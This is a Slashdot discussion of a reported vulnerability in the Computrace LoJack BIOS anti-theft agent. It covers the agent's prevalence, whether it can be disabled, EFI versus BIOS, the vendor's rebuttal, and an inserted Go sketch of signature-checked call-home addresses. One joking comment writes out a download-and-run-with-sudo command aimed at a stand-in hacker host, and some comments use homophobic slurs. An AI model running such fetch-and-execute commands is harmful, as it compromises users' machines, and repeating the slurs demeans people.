BIOS "Rootkit" Preloaded In 60% of New Laptops
Keldrin_1 writes "Researchers Alfredo Ortega and Anibal Sacco, from Core Security Technologies, have discovered a vulnerability in the 'Computrace LoJack for Laptops' software. This is a BIOS-level application that calls home for instructions in case the laptop is ever lost or stolen. However, what the application considers 'home' is subject to change. This allows the creation of malware capable of 'infecting the BIOS with persistent code that survive reboots and reflashing attempts.' Computers from Dell, Lenovo, HP, Toshiba, Asus, and others may be affected."
P.C. Phone Home.
Sounds like it's right up Sony's alley.
"You can't really dust for vomit" --Nigel Tufnel
60% seems awfully high for a program I've never heard of. Not that I've been laptop shopping lately, but still.
Can someone with some knowledge please explain to me why we can't build a machine with simple boot code that does not EVER need to be modified for the life of the hardware?
"I'm just here to regulate funkiness."
LoJack swiftly changes to HiJack with a good splash of water
Libera te ex Inferis!
Seriously, why did I get a Gateway in the first place?
Just like SPTD is not a rootkit when it hides my emulated dvd from copy protection software.
This is a popular piece of software that happens to have a potentially serious bug that the vendors and users should be demanding be fixed, but it doesn't make it a rootkit.
Macbooks will give you teh gay, which I guess is not a problem if you already smoke teh cock.
I know it's hard to believe. When doing our research (I'm Alfredo, hi!) we couldn't find a notebook *without* the Computrace agent. It's bad.
Cmon, it's a rootkit BY DESIGN, so it can't be wiped off the laptop easily.
Sheesh.
Someone should do a car analogy for this...
Sent from your iPad.
I was just thinking the same thing. Considering that the list of models with this stuff in the BIOS doesn't include Acer, who ship more laptops than anyone else, or HP, or several other big players, I'm a bit sceptical of that figure. Still the list is quite extensive, I'm a bit surprised I haven't heard of this.
Oh no... it's the future.
I use a Macbook.
Really? My Macbook has it installed. Not that worried yet.
Recommending changing name to MIOS.
Malicious Input Output System.
Ok, so it does include HP. It's been a long day, and I go home in 3 minutes.
Oh no... it's the future.
"the duo demonstrate methods for infecting the BIOS with persistent code that survive reboots and reflashing attempts"
Where exactly is the code stored, that survives reboots?
http://store.lojackforlaptops.com/store/absolute/DisplayProductDetailsPage/productID.104509100
Congrats, there is a Mac version available as well. PC's and Mac's are all the same parts made by the same slaves chained together. there is a few companies in the world that make a basic computer and then Dell, HP, Apple and others add a few things and brand it for themselves.
Don't people specifically BUY LoJack for laptops, or does it come preinstalled and you pay to activate it?
It clearly has bugs, but I thought the hard/impossible to remove was considered a feature of the software?
You mad
Any way to tell if your laptop has this "feature"?
And is there any way to disable it?
Just to let you know my position;
I have a Dell laptop, and every laptop I have had for the last three years has had the Computrace option in the BIOS. It comes neither active nor deactivated; once you make a choice it's irreversible (the BIOS alerts you to it). Once activated, no matter if you rebuild the laptop it will reapply the 'Feature'; what is alarming is that the feature as of late is geolocation-aware in some incarnations. I would like the option to have a BIOS patch remove the feature for good, as it appears that it may be compromised.
It also doesn't seem to be too hard to circumvent for the professional thief, who may just use Dell's service tools to change the asset tag.
I use a Macbook.
As do I, but that does not mean that I have any delusions as it relates to security.
There are quite a few bits of exploitable code available that, if properly engineered, can do quite a bit of damage to an Apple computer. Simply because there is no Mac version of the "Melissa" virus does not mean that as a Mac user I should assume that there will never be one.
And let's not forget the iLife torrent that had something special added to it. There are plenty of individuals attempting to prove to the general public that a Mac is no more secure than its Windows counterpart, and it will be not a false sense of security, but a lack of personal responsibility that will assist in that.
Opinion, obviously. Results may vary.
Those who believe the Internet is private,
find their privates are on the Internet.
1. How can I determine if a laptop has this?
2. Are there any workarounds? Fixes? Can it/Should it be disabled?
Lou
So, the idea was to load "sleeper" software by default on all these machines? Is the URL associated with this "service" always at the same memory location? It shouldn't be that hard for a Malware author to check for this BIOS and try to change the address. Who feels like being monitored by criminals? 10% off sale price?
The pair recommended a digital signature scheme to authenticate the call-home process.
How's that going to help? If you can replace the IP address then you can replace the certificate and signature too. If you have access to modify the BIOS flash, it's game over.
Moderating "-1, Disagree" is simple censorship. Have the guts to post your opinion.
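The exchange above (a signature scheme for the call-home process, and the reply that whoever can rewrite the address can rewrite the key and signature too) turns on where the verification key is stored. The Go sketch below is an added example, not part of the thread and not Computrace's code; the `Flash` layout, the write-protected `PinnedKey` region and the host names are assumptions constructed for illustration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
)

// Flash is a constructed model of firmware storage, not Computrace's layout.
type Flash struct {
	// Writable region: anything with flash write access can change these.
	CallHome  string
	Signature []byte
	StoredKey ed25519.PublicKey
	// Hypothetical region that is write-protected in hardware.
	PinnedKey ed25519.PublicKey
}

// ErrBadSignature is returned when the stored address does not verify.
var ErrBadSignature = errors.New("call-home address failed signature check")

func newKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// Provision returns factory state: the vendor signs the address, and the
// vendor public key is stored both beside the data and in the pinned region.
func Provision(addr string) *Flash {
	pub, priv := newKey()
	return &Flash{
		CallHome:  addr,
		Signature: ed25519.Sign(priv, []byte(addr)),
		StoredKey: pub,
		PinnedKey: pub,
	}
}

// RewriteAddress models a change to the address field only.
func RewriteAddress(f *Flash, addr string) { f.CallHome = addr }

// RewriteAll models a writer that replaces everything in the writable
// region and re-signs with a key of its own, as the reply describes.
func RewriteAll(f *Flash, addr string) {
	pub, priv := newKey()
	f.CallHome = addr
	f.Signature = ed25519.Sign(priv, []byte(addr))
	f.StoredKey = pub
}

// ResolveHome returns the address the agent would contact. With usePinned
// false it trusts the key stored beside the data; with true, the pinned key.
func ResolveHome(f *Flash, usePinned bool) (string, error) {
	key := f.StoredKey
	if usePinned {
		key = f.PinnedKey
	}
	if !ed25519.Verify(key, []byte(f.CallHome), f.Signature) {
		return "", ErrBadSignature
	}
	return f.CallHome, nil
}

func main() {
	f := Provision("tracking.vendor.example") // constructed host name
	RewriteAll(f, "elsewhere.example")        // constructed host name
	_, errStored := ResolveHome(f, false)
	_, errPinned := ResolveHome(f, true)
	fmt.Println("key beside data rejects rewrite:", errStored != nil)
	fmt.Println("pinned key rejects rewrite:     ", errPinned != nil)
}
```

A signature catches an address-only change in either configuration; it catches a full rewrite only when the key sits somewhere the writer cannot reach, which is the hardware write-protection question raised elsewhere in the thread.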
We're talking about a BIOS rootkit. The BIOS runs directly on the hardware. It doesn't really care what OS you're loading, unless it has some specific reason to.
Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
From the Lojack compatibility list here is a list of companies:
ASUS, Dell, Fujitsu, GammaTech, Gateway, GD Itronix, Getac, HP, Lenovo, Motion, Panasonic, Toshiba
You can find a list of models on the "bios compatibility list"
Please tell me if I'm missing something, but isn't the real vulnerability that the BIOS can be modified with unsigned code? A BIOS that allows this can be infected with a rootkit regardless of whether the LoJack code was there.
I'm surprised that hardware manufacturers haven't made better use of persistent on-chip data. A huge opportunity exists for device firmware developers to embed advertising. Imagine installing a Sony DVD drive that detects non-proprietary discs and pops up a suggestion to purchase Sony discs. It isn't too hard to imagine Sony including a special bit string on their blank DVDs that their players look for each time a disc is inserted. Or several advertising partners with products that, when present, can create an "advertising opportunity": Sony DVD, Intel cpu, Microsoft OS and D-Link router trigger a cross-market moment.
You'll have to load your laptop into BIOS, it's one of the options listed. I set the option to completely disable it. That doesn't mean that someone could somehow modify code to turn it on, and report it to their site.
Go into the BIOS setup, you can choose to activate the feature if you paid for the license, or deactivate a previously activated agent. Choosing disable removes the feature completely. It can NEVER come back. TFA is hype. If it is never enabled in the bios NOTHING is installed on windows.
Good thing this doesn't come on the cheap models, I bought a cheap-as dirt ($300 new, not a netbook) Toshiba laptop that is a L305-S5955 and thankfully it doesn't have this "feature" but I feel like I dodged a bullet with this one.
Taxation is legalized theft, no more, no less.
We're talking about a BIOS rootkit. The BIOS runs directly on the hardware. It doesn't really care what OS you're loading, unless it has some specific reason to.
Uh, yeah, we are talking about a BIOS feature that some companies choose to install. Macs do not come with a BIOS but rather use EFI. Have you heard of Google?
Apple would have to deliberately include an EFI compatible version of this feature in order for this to be applicable.
Jesus was a compassionate social conservative who called individuals to sin no more.
Why can't computer manufacturers just sell clean working laptops with clean Windows installs plus drivers on a basic BIOS that just includes a few items like which drive to boot from and a hard drive corruption check? It's getting a little bit ridiculous. There are several dozen crapware programs on most mass-market laptops, then you've got the root-kit BIOS, apparently, and the trusted computing module (And to this day no one has really been able to adequately explain to me what features the TCM gives me despite its ubiquity). I know laptops are getting cheaper, but they are also getting more and more aggravating in some ways.
This BIOS issue is more annoying than the crapware thing, really, because at least crapware can be removed in the control panel (Well, usually, I've seen a program or two refuse to uninstall) or through my computer, but a BIOS flashing is beyond most people's level of technical expertise. It's not anything else technological these days, it seems like, from software to hardware, we're told what we want and then "given" it and have no say in the matter, even if we like the old way better.
Computrace comes loaded in the bios of all of my Dell Latitudes. It is "inactive" until you turn it on in the BIOS. Once activated, there is no way to disable it.
There is a one time license fee to register the Computrace machine on their website. It uses IP based location. Windows will recognize the computrace hardware and install a "Generic USB HUB" driver for it (thanks MS). It must also interface with WMI in some way, as the website will also pull up some details on the computer's specs.
Once you flag the machine as stolen, Computrace (the company) tries to track it down. If they are unable to return your laptop within a certain amount of time (30 days I believe) they pay out 70% of the value of the laptop.
So? EFI = not-so-basic basic input/output system.
There's a mac version of LoJack. Whether or not it is installed on a Macbook would depend on whether Apple chose to preload it, I suppose. A hackintosh, OTOH, might be more likely to have it.
Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
It's even easier to add this feature to EFI than it is to BIOS since EFI was designed to be Extensible.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
It is indeed hard to believe. As far as I've been able to tell, even in the laptops where it ships, it defaults to disabled. You must actively enable it in the BIOS for it to do anything at all. And it is certainly easily possible to get laptops without it - I just did from HP, two different ones.
Flame bait, I just call it attracting the "homosexual Mac crowd"
"Congrats, there is a Mac version available as well."
The Mac version appears to be software install only, not the BIOS-resident version. Apple is not listed as a partner on the web site.
A.
...bringing you cynical quips since 1998
Disable only works if the product was never activated. If the BIOS is set to active, AND the client software on the machine contacts the servers for Computrace, and verifies it should be licensed, then it "flips a switch" in that BIOS setting, and you can NEVER disable it again.
They need to write to the software, or else the software will always try to contact them, and then anyone could track any laptop with a subpoena, ruining their business model. Instead, it has to be "turned on".
Also, this software in the BIOS does not actually contact anyone directly. All the BIOS level crap does is forcibly try to re-install the agent software under windows. This could get ugly, if you update the BIOS, to try to force it to install a different program every time someone reloads windows...
Of course, I wonder what happens if I buy an "off lease" laptop, that was at one point activated...
What are we going to do tonight Brain?
Are you saying that this is a BIOS-level process that only introduces a Windows vulnerability? So Linux users and Hackintoshers are safe?
Some get money for putting crapware on their systems. However, the one thing I hate more are the annoying OEM branded programs. Ok, sure, I want a CD burner that can burn ISOs, however I don't want a TOSHIBA (R) DISK BURNER, even though it's a decent disk burning program, I hate OEM branded stuff, I buy a computer, I'm smart enough to know there's very little difference between this Toshiba and a similarly equipped Compaq. The OEM branded wallpapers also annoy me, yes, I know what computer I bought. It says so everywhere on the machine, it doesn't matter. I don't need OEM wallpapers.
But, that is what happens when you get a system designed by a marketing department...
Taxation is legalized theft, no more, no less.
First off, the 'feature' comes on a lot of laptops. Doesn't mean it's enabled. You have to request it to be enabled in order for it to come from factory with it actually turned on.
If you don't turn it on, it doesn't do anything, no phone home, no remote wipe, no tracking.
Guess what, same thing applies to Blackberrys, and iPhones, and cars with LoJack that have remote shutoff. For every feature there is a potential risk, that's the way the world works.
If you want the potential to remotely locate/track and wipe a laptop or PC, then you also get the potential that someone else can do it as well.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
Since most laptops come with Windows, and, well, you get my drift...
oh, that's right, those aren't BIOS rootkits, nevermind. Makes all the difference.
Though I don't much care if my machine is compromised in pre-execution or later. All the same crap to me.
I wonder if the bad guys have bothered to monitor LoJack transmissions for cars. At least you'd know where the cops are, and could plan to be elsewhere...
deleting the extra space after periods so i can stay relevant, yeah.
When doing our research we couldn't find a notebook *without* the Computrace agent.
You didn't look very hard then, did you? Acer don't have CompuTrace and finding one of their notebooks is hardly challenging. According to the most recent data from NPD's DisplaySearch, Acer has the second largest unit-volume market share, with 16% of the global notebook shipments (excluding netbooks) to themselves.
Obviously you know that, because as the ZDNet article based on your presentation stated, fully 40% of all new notebooks don't include Computrace. With nearly half of notebooks not including the technology, it's obviously pretty darned easy to find a notebook without Computrace. Polemic statements like that still don't do your credibility any good, though.
PC's and Mac's
The apostrophe is not used for pluralization. You meant "PCs and Macs."
together. there
You are missing capitalization on the first letter of a new sentence.
there is a few companies
Since "companies" is plural, you need to say "there are a few companies."
They do. It's not enabled from the factory. You have to pay extra to get it to actually work. It is completely hidden to the OS unless enabled in the BIOS at boot time.
I realize you just read some FUD kdawson forwarded for us, but you have to take extra steps to make this software work. Out of the box there is nothing to do, you don't have to 'remove it', when the BIOS transfers control it is for all intents and purposes not available.
It is an optional feature, like traction control on your car or overdrive, you just turn it off.
If you don't want it enabled the solution is REAL simple, don't buy a laptop with computrace installed. There are plenty out there without it.
To use a car analogy, can you go to a dealership and buy a car without an engine? No. But you can find a car without air conditioning, if you put a little effort into it (depending on where you live, air conditioning may be an option rather than standard so bear with the analogy).
When you buy mass market cookie cutter products in order to get a lower price then you don't get to specify the exact specifications yourself, you take one of the options you are given as you have to choose what most people want.
If you want to pick anything you want then you have to build it yourself, which is FAR more expensive.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
They have every DV/TC-model of HP Laptop listed - I used to specifically work on all DV/TC/NC/NX models, I've NEVER ONCE seen this in BIOS during any of my repairs. NEVER. Also, this software was never listed in part of HP's troubleshooting guides, and that usually means that feature is not there.
I rebooted my laptop (DV9000, full featured loaded with every possible thing offered) and this 'rootkit' in BIOS is nowhere to be found, at all. Not on my friend's DV2000. Not on the new TC4400 I have in my art room.
Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
Yea, but Sony does sell the "Computrace LoJack for Laptops" for their notebooks in their Sony branded VIP Protection Suite (which includes Norton NIS, Online backup and Computrace LoJack for Laptops).... But I guess in this case, you can optionally choose this Sony RootKit.... lol
EFI
Learn to macfag
Successful Slashdot troll is, err, successful.
Anyone who thinks that the Darwin-BSD codebase and XNU kernel are as prone to exploitation as Windows kernelspace is dreaming. For one thing Darwin-XNU is open source, so anyone who likes can peek under the hood and suggest improvements. Now XNU isn't perfect, but the Windows kernel is a train wreck at 35,000 feet.
The problem is that Mac users think their computers are invulnerable to exploits and then don't practice safe hex. But if you think your Windows box is just as safe as your Mac box you're going to get a nasty wakeup call at some point in the near future.
A list of participating manufacturers is right there on the company's web site: http://www.absolute.com/partners/bios-compatibility
My company recently investigated the LoJack system after one of our laptops got stolen. It's impressive technology. The sales rep talked up how "fortunate" they were to get the cooperation of many BIOS implementations from the folks who make BIOSes. I don't think that's fortune at all -- it's a corporate deal. Whatever.
It's common but not all-pervasive. (yet?) I looked for my laptop on the list and didn't find it, though, so it's not exactly all-pervasive. It's intended for corporations and individuals who want it.
While the inclusion of this feature into many BIOSes is kinda creepy, I'm not terribly unsettled by it. It does, however, make me want to pursue the open BIOS initiatives.
*sigh* Isn't there some way we could have a "write-only" jumper that locks the chip from being flashed or modified?
LOLjack
I will not be pushed, filed, stamped, indexed, briefed, debriefed or numbered. My life is my own.
Well, once upon a time, that was the case :
In case of bug you needed either to move the BIOS chip to a separate flasher, or at least use a hardware switch on the motherboard to switch between 5v and 12v to enable BIOS chip flashing.
Nowadays, even Windows applications can write to the BIOS without any peculiar form of control. No switch at all involved.
BIOS rootkits were just bound to happen. What makes it even easier for rootkits is that 90% of all PCs use the same brands of BIOS, and those BIOSes are designed in a modular fashion, making it easy to add a "rootkit" module without needing to re-create a whole new BIOS (see the example of how to embed FreeDOS inside an Award BIOS).
That's pretty much stupid: most motherboards have a couple of bugs fixed during the first couple of months. Then there's mostly no need to reflash the BIOS, except for supporting newer CPUs, etc... which would require opening the case and accessing the motherboard anyway. But for the whole lifetime of the BIOS, it remains completely writeable even from user-space applications from within highly insecure OSes.
Hardware "write-protection" switches for BIOSes should be reintroduced. Simple fix for a simple problem.
Instead you can stay sure that the manufacturers and Microsoft are going to require several layers of TPM and similar forms of DRM in BIOS which won't even guarantee that BIOSes would be protected from bugs.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
I have worked with Computrace at one of my previous companies, and I always knew it was total crap.
It doesn't even work as advertised most of the time and defeating it is so simple a 5 year old with some skill could do it.
Power Corrupts,Absolute Power Corrupts Absolutely, leaving one person(group)in charge is absolutely corrupt.
"Of course, I wonder what happens if I buy an "off lease" laptop, that was at one point activated..."
The Original Vendor (DELL, IBM, etc) has the ability to reset activation state.
Power Corrupts,Absolute Power Corrupts Absolutely, leaving one person(group)in charge is absolutely corrupt.
As the AC troll noted, Macs use EFI, not BIOS. That means that the mac software that the grandparent linked to does not survive a disk wipe or swap. That in turn means that the software running above is running only on the hard disk and not the bios, and is not persistent so you can get rid of it easily once installed by just reformatting (or presumably just deleting the files will do it as well).
I find it ironic that the slashdot moderators have gotten the moderation precisely wrong here. The great-grandparent AC was absolutely right, one solution to this rootkit is to own a mac since they don't use BIOS, they use EFI. But this is modded flamebait, and the misinformed grandparent who linked to the software is modded informative.
Gentlemen! You can't fight in here, this is the war room!
I've had 4 laptops in the past few months, and none of them had any BIOS options resembling anything like that... maybe I just got lucky?
...at least on my Dell.
There's option to enable it permanently, meaning it cannot be disabled again.
So number of affected laptops is far from 60%.
60% may be vulnerable, but it is a bald faced lie to say that 60% are preloaded with a rootkit.
A slashdotter who didn't build his own computer is like a Jedi who didn't build his own lightsaber.
One of our BIOSes is broken, because I can turn my copy off on a whim. Perhaps it's because my bios requires an admin password? I dunno, but I have no problem disabling it. Perhaps it's not really disabled?
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
And if it's enabled, will anything happen under Linux? Is there even a Linux client, so I can consider whether to buy the service?
It's offered really cheaply on a bunch of Dells. The program calls home and reports its IP address when activated after being stolen. I doubt if the police are going to do anything with the report of an IP address on a stolen used computer that might be worth $1000 (probably less). All the cops are going to tell you to do is a) use a cable lock in the future b) don't leave the machine in your (car, house, office, etc.) in plain sight and c) call your insurance company. In most cities, cops don't even investigate stolen cars. The original lojack for cars (identifier beacons) might have been useful in a couple of cases, but lojack for computers is almost a complete waste of money. Better off investing in a) a cable lock, b) computer cover and c) insurance.
... is that it allows for malicious code to be uploaded to the machine and the modifications will survive re-flashing and drive wipings. That is a HUGE glaring vulnerability right there and it might not even matter if you enable or disable the feature, if you use it, or if it is able to be disabled/enabled once set. The article does not mention whether it is necessary for it to be enabled, so let's assume it is not. It is not too much of an imagination stretch to envision malware that is able to upload changes to the BIOS from the desktop that include the necessary settings for a successful attack. This is bad. Very bad.
The eternal struggle of good vs. evil begins within one's self.
As I posted above, the mac version resides solely on the hard drive and NOT IN THE EFI, which means that it can be easily removed and does not come back. As another has posted, Apple isn't listed as a partner on the company's site and it is not pre-installed. Therefore, macs are fairly safe from this, even if you have it installed, you just have to remove it from your hard drive.
Gentlemen! You can't fight in here, this is the war room!
Yeah, it's pretty funny that a piece of software that has nothing to do with Microsoft that gets loaded on hardware that Microsoft has nothing to do with by the OEMs themselves through a deal with a completely different company is not mentioned in a Microsoft commercial about Windows. Or actually, it's really not.
The point is that it makes it super easy...all the police have to do is show up. Lojack provides evidence and testifies, if necessary. Police are working with a company they're used to working with.
After all, they care about noise complaints.
That said, I still think a cable lock is a ripoff
posted primarily to undo moderation that /.'s fucking AJAX put in for me.
93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
True, but I'm still wondering how this would affect someone who wanted to build a hackintosh, since the LoJack driver is in the BIOS and it's intentionally difficult to remove. If your computer was originally intended to have XP or Vista, you might have the LoJack driver.
Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
It really doesn't matter how secure your computer is if you think you're invulnerable and are in the habit of typing
wget http://www.h4x0r.org/pwn.sh
chmod a+x pwn.sh
sudo ./pwn.sh
93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
Actually this could be built into EFI. Apple don't, but if a laptop manufacturer wanted to they could. It's even easier than BIOS - an EFI ROM is a structured filesystem containing all the drivers and commands required to boot.. things like the display and keyboard drivers. Adding this software could be done after the fact without even having to touch the original code.
At least on Dell laptops, there is a method of disabling CompuTrace after activating (or re-enabling it once "disabled permanently") by erasing the contents of a certain EEPROM chip...
> This is a BIOS-level application that calls home for instructions in
> case the laptop is ever lost or stolen. However, what the application
> considers 'home' is subject to change.
Reminds me of an old cartoon where two people are standing right outside a bank's new, mighty vault. One's pointing at 3 foot hole in the wall with a plug lying on the floor, "...and that's the escape hatch in case someone gets locked in."
(-1: Post disagrees with my already-settled worldview) is not a valid mod option.
[Citation Needed] There has yet to be a single complaint about Apple's employee work conditions, even for contractors.
Grammar Nazi's does add's a lot of value to the conversation's.
The article isn't really clear how the malicious code would be initially installed.
Does the user have to run an executable that flashes the BIOS? Do you need root access?
Please explain to me how this works.
This BIOS 'switch' - how exactly is that flipped? CMOS is not permanent, NVRAM is not permanent, RAM is not permanent. The only permanent storage are removable devices such as hard drives, and the BIOS itself. The BIOS is usually protected physically (jumper) and isn't a 'volatile' storage means anyways. Also, from my understanding, this isn't something that can be reprogrammed on the fly - it has to be done in "real mode" and is done on a block level, rather than bit level (just like programming any other chip).
I just either lack the magic clue that tells me how this is possible, or this isn't possible at all.
For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
You're not missing any clues; it's just impossible.
My Dell Inspiron 6000's last BIOS update (several years ago) came with some Computrace back-end stuff, with the aforementioned options for on, off, and disable. On and disable are both "permanent" options.
Which is really interesting, if you follow the timeline: The feature wasn't there at all to begin with. And then, I flashed it in. And now, it says it's permanent. Uh - yeah, right.
If I set it to "on" or "disable", it'll just flip a bit somewhere, and/or do some magic crypto, and flash that result into a region of BIOS.
But, it's still all just flash. It can still be erased, and then it can be rewritten. The BIOS might not support doing this on its own (for reasons which might range from management to marketing), but that doesn't mean that it's something that cannot be accomplished with other tools.
Kid-proof tablet..
So if this is on the bios and works with an installed program on the machine, isn't it feasible to pull the HDD and replace it?
As for the bios, like was said, it may get ugly.
If it's active, there is probably some way to shut it off...
I got my Dell about 8 months back. The sound didn't work at first and I went to the BIOS and saw some option that allows for the laptop to be tracked. I guess this is it. Is the laptop still vulnerable even if this feature is turned off? Mine came with it turned off as default. Maybe you gotta pay extra for it, I dunno.
Including Windows means the laptop is not clean.
If someone is passing you on the right, you are an asshole for driving in the wrong lane.
So you're here for a date then?
Perhaps they have some form of WORM memory? However, given the example of a machine that never had the feature until a BIOS update, I'm guessing it's just tucked away somewhere in the regular BIOS memory.
And then, I flashed it in. And now, it says it's permanent. Uh - yeah, right.
If I set it to "on" or "disable", it'll just flip a bit somewhere, and/or do some magic crypto, and flash that result into a region of BIOS.
Of course you could disable it. But that's not the point.
There seems to be a prevalent view on /. that because a security system can be disabled, it always will be and is therefore pointless. But anyone who's got enough knowledge to know about the existence of this is probably not a junkie that steals laptops left alone for a minute on the train. And that's what the great majority of petty theft is.
Well no shit there. I think what everyone is trying to say and yet the mods choose to ignore is "yes Virginia, Mac hardware are for the most part immune from this because:
They use EFI
EFI is not supported and the Mac version runs from the HD and can easily be removed
Macs are not listed as a partner on the site.
"Of course, I wonder what happens if I buy an "off lease" laptop, that was at one point activated..."
Don't run Windows, excepting virtual instances.
"This post is an artistic work of fiction and falsehood. Only a fool would take anything posted here as fact."
Yup, just like Daemon tools (or at least the part that does the actual emulation) is very rootkit-like technically, as long as it does what the user wants it isn't a rootkit. Although it must be said that if the software (due to a bug or something) ends up in a state where it doesn't do what the legitimate user wants and doesn't allow him to remove it, it can become a rootkit and that is something that software developers should try to avoid. Perhaps splitting the software in two parts, one that can only remove the software under proper authentication and the other to do the actual work that is designed in such a way that whatever happens to it it can never overwrite the first part, would help.
Go into the BIOS setup, you can choose to activate the feature if you paid for the license, or deactivate a previously activated agent. Choosing disable removes the feature completely. It can NEVER come back. TFA is hype. If it is never enabled in the bios NOTHING is installed on windows.
So, if I want to steal a laptop and I'm afraid of this Lojack thing, all I have to do is simply disable it in the BIOS and the laptop will never phone home? Doesn't this kind of defeat the purpose of Lojack in the first place?
If I can be modded down for being a troll, can I be modded up for being an orc, or a balrog?
The title is VERY MISLEADING.
I've got a few Dell laptops that are friggin ancient in my book (aka single core) and they have computrace settings in the bios.
Get into your bios and disable it, if you have no intention of using it.
Sos groso, sabelo.
I imagine it's a fuse/bit. You have to be able to prevent the laptopknapper from disabling or flashing your BIOS in order for it to be an effective security measure.
Actually, if you decompile the DSDT of many machines you will see that they do indeed detect what OS is running and act accordingly. This is the cause of a lot of Linux problems because BIOS vendors will special case something for, say, XP that isn't needed in Vista but is needed in Linux. As the machine has been identified as running Linux and not XP, that special code isn't run. The Linux kernel even has boot options to allow you to identify to the BIOS that you are running a different OS for this very reason.
Computrace (R)
Disable - Deactivate - Activate
This field lets you Activate or Disable the BIOS module interface of the optional Computrace (R) Service from Absolute(R) Software. The Computrace agent from Absolute Software is a service solution designed to help track assets and provide recovery services in the event the notebook is lost of stolen. The Computrace agent communicates with the Absolute Software Monitoring Server at programmed intervals to provide the tracking service. By activating the service, you consent to the transmission of information from and to your computer and the Absolute Software Monitoring Server. The Computrace service is purchased as a separate option and the monitoring Server will enable its agent security module through an interface provided by the BIOS. The Computrace tracking agent can only be used in the US, UK, Canada and Australia. Computrace(R) and Absolute(R) are registered trademarks of Absolute Software Corporation.
Disable = Permanently block the Computrace module interface.
Deactivate = Block the Computrace module interface (Default).
Activate = Permit the Computrace module interface.
The Absolute Anti-Theft solution is Disabled. You cannot change the setting.
# tpm module killall:
blacklist tpm_infineon
blacklist tpm
blacklist tpm_bios
It loads up to communicate using the TPM. I should know, I just spent months trying to find why my box was bouncing packets of a particular IP .. so under Linux you just blacklist the 3 tpm modules .....
So you think it all takes place at BIOS level?? That's BS.
This is a very bad thing. A "security" product should not allow downloading of software. This is even worse. It allows hidden downloading of software not visible to the user.
Supposedly it's delivered "turned off"? But how do you know it's turned off at startup? How do you know it wasn't turned on during operating system loading, or wasn't turned on by any of the preloaded crap that the "major PC manufacturers" preload? How do you know there isn't some way to turn it on remotely?
No computer with this software in ROM should be used for proprietary material, legal documents, medical records regulated by HIPAA, financial records regulated by the SEC, or anything else that might attract an opponent. If you just play WoW, go ahead.
Ever hear of a fusible link? It's conceivable that a small fuse is blown upon activation, and then the connection that fuse made is tested to see if it should be active. Write-Once, Read-Many (WORM) memory.
ERROR: SIG NOT FOUND (A)bort, (R)etry, (F)ail?:
Well, I did - but I didn't apply it to BIOS. (I only know of them in the context of microcontrollers)
For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
No, I don't think I can disable it. I can only issue an instruction to a computer which is described as disabling the function permanently, but that doesn't exactly mean anything important.
Here's the scenario:
I "disable" it, the appropriate bits are written into the flash ROM on the motherboard, and it appears to be disabled.
Later, something else comes along, and writes different bits into the flash ROM. And then it's not disabled anymore.
(And, whatever the case, the default is "off," which should at least forestall any white hat usage of the thing without user intervention. Emphasis on "should" and "white hat". It's Really Fucking Important to maintain a certain level of mistrust when it comes to considering such matters.)
And, whatever the case: I don't think it even matters at that point. The thing still needs some software support in order to work, and the package which includes that software can fairly easily modify the BIOS to include whatever small bit of code the programmer decides should be there.
There are well-documented, reliable, and easy methods for inserting your own code into BIOS to initialize a SCSI card, perform a network boot, or change the Energy Star logo, and there's no reason at all why these same methods cannot be used for purposes other than those I just listed -- including, of course, quietly inserting malicious backdoors.
Kid-proof tablet..
Ok, so: Blow the fuse upon either activating or disabling it.
And then, something else comes along and changes the code that looks for the status of that fuse.
Ever hear of a video game crack? This sounds trivial, by comparison.
Kid-proof tablet..
So, bottom line - I don't imagine people owning Vaios long enough for them to be too problematic. They'll be in the shop being repaired every six months!
My vaio desktop is 10 years old; A solid computer and still used regularly. Did the VAIO brand go to shit while I was under a rock?
TCM has roots in a paper called "Programming Satan's computer" the first paragraph of the conclusion is this ...
We have tried to give an accessible introduction to the complex and fascinating
world of cryptographic protocols. Trying to program a computer which is under
the control of an intelligent and malicious opponent is one of the most challenging
tasks in computer science, and even programs of a few lines have turned out to
contain errors which were not discovered for over a decade.
The second sentence tells you what TPM is for; hint: it's not for you.
They don't complain because they commit suicide.
<quote>
Foxconn just increased the compensation for their worker that killed himself as a result of possible beatings and interrogations over a lost iPhone.
The family now gets $52,600 (up from $44,000) as well as $4,385 every year as long as one of the parents are alive. The Foxconn official that leaked this information to the press spoke anonymously since he wasn't a qualified press-relations employee. [Yahoo]
</quote>
http://gizmodo.com/5324967/foxconn-increases-compensation-for-iphone-suicide-employees-family
lrn2macfag
Please read the paper. The configuration is saved in NVRAM and there are many ways to reverse it. We even found a software-only way.
Never say never.
I work for Absolute Software. Absolute reviewed the research paper, and the claims that there's a vulnerability in Computrace or Computrace LoJack for Laptops BIOS module are without merit and systems are secure:
- The Computrace BIOS module does not allow a special undetected path into the operating system. It is not a rootkit.
- In order for the Computrace BIOS module to work, it is activated by the end-user customer, not the computer manufacturer, upon receipt of the computer and activation of Absolute Software's products.
- The Computrace BIOS code alleged in the article to have this vulnerability is old code that was not officially released into a BIOS and, to Absolute's knowledge, has never been active in the BIOS of any computer.
- If a malicious attacker were able to alter the BIOS code, any popular anti-virus software would alert the customer.
- The Computrace BIOS module currently on the market is not susceptible to the risks claimed in the article and therefore none of our customers are at risk for this specific type of attack.
Absolute has issued a statement to the public, refuting these claims and explaining their position at length here: http://www.absolute.com/company/pressroom/news/2009/07/refutes_claim
Absolute refutes the claims of BIOS vulnerability:
http://www.absolute.com/company/pressroom/news/2009/07/refutes_claim
